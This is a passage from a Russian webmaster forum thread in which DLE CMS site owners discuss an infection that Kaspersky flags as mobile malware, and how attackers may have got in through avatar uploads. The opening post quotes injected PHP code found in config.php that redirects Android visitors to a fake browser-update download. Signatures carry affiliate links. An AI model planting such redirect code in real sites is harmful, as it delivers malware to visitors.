Оwer xz. Там где ломали, везде регился tehApocalypse - Безопасность

Вирус на сайте cms dle

super_keks · 2012-12-29T15:25:12.0000000Z

Здравствуйте! Со вчерашнего дня при заходе на сайты (cms всех сайтов dle от 9.3 до 9.7) с помощью браузера opera, KIS 2013 выводит предупреждение (скриншот http://smotr.im/awTn ). На других сайтах на этом хостинге та же проблема. В браузера google chrome такой проблемы не замечено. Отписал саппорту касперского и получил ответ "...statuses.ws/googleanalisys.js - является мобильным зловредом". По сайту пошерстил и подозрительных новых файлов не обнаружил. На одном сайте в config.php внизу нашел код: if ($android === true) { header('Location: http://file07.com/browser_update/215/browser_update ') } После его удаления АВП так и продолжает реагировать. Если кто сталкивался прошу подсказать.

PK

89

phoenix_kys

23 января 2013, 07:23

#251

ower_xz

тогда ломали не через аватарку, потому что у меня 9.5 и тоже самое...

45

ower_xz

23 января 2013, 07:31

#252

phoenix_kys:
тогда ломали не через аватарку, потому что у меня 9.5 и тоже самое...

phoenix_kys, может и не через DLE ломали (если лицензия, конечно)... Хостинг хостингу рознь, многие через дыры на серверах влезают... Адреса панели управления и phpmyadmin мало кто из хостеров прячет... Точнее только логи скажут...

PK

89

phoenix_kys

23 января 2013, 07:43

#253

ower_xz

там где ломали, везде регился tehApocalypse

значит без этого не могли ломануть

B

19

bunina

23 января 2013, 08:13

#254

Точно, и взламывали разные версии, через аватарку

249

ProLiant

23 января 2013, 09:10

#255

phoenix_kys:
ower_xz

там где ломали, везде регился tehApocalypse
значит без этого не могли ломануть

А что мешало другому, под другим именем и айпи сделать тоже самое?

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)

R0

20

region029

23 января 2013, 09:18

#256

Я чёт так и не понял, можно решить проблему патчем для версии 9.6, если двиг 9.6, ну чтоб не обновляться до 9.7 ?

B

19

bunina

23 января 2013, 09:21

#257

По моему нет, так как:

Патч ТОЛЬКО для 9.7. Читайте внимательно:

PK

89

phoenix_kys

23 января 2013, 09:27

#258

ProLiant

можно и под другим было это сделать...

но видать все делалось прогой, сперва реганулись, а потом через N-количество дней закидывали аву.

...

у меня на аккаунте около 5 сайтов, ломанули только 2...

1

LimonCash.com - Лучшая партнерка GoGetLinks.net: ссылки навсегда на ePayService: обналичивание чеков 2%,

B

19

bunina

23 января 2013, 09:43

#259

phoenix_kys:
ProLiant

но видать все делалось прогой, сперва реганулись, а потом через N-количество дней закидывали аву.
...

То есть, вы хотите сказать, что сначала регистрировался бот, а аватар уже вручную позже заливали?

R0

20

region029

23 января 2013, 09:55

#260

webdiscover.ru сделан на DLE, но его вроде как не взломали и гифки туда можно лить

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы

Open AI тестирует память для ChatGPT

Вирус на сайте cms dle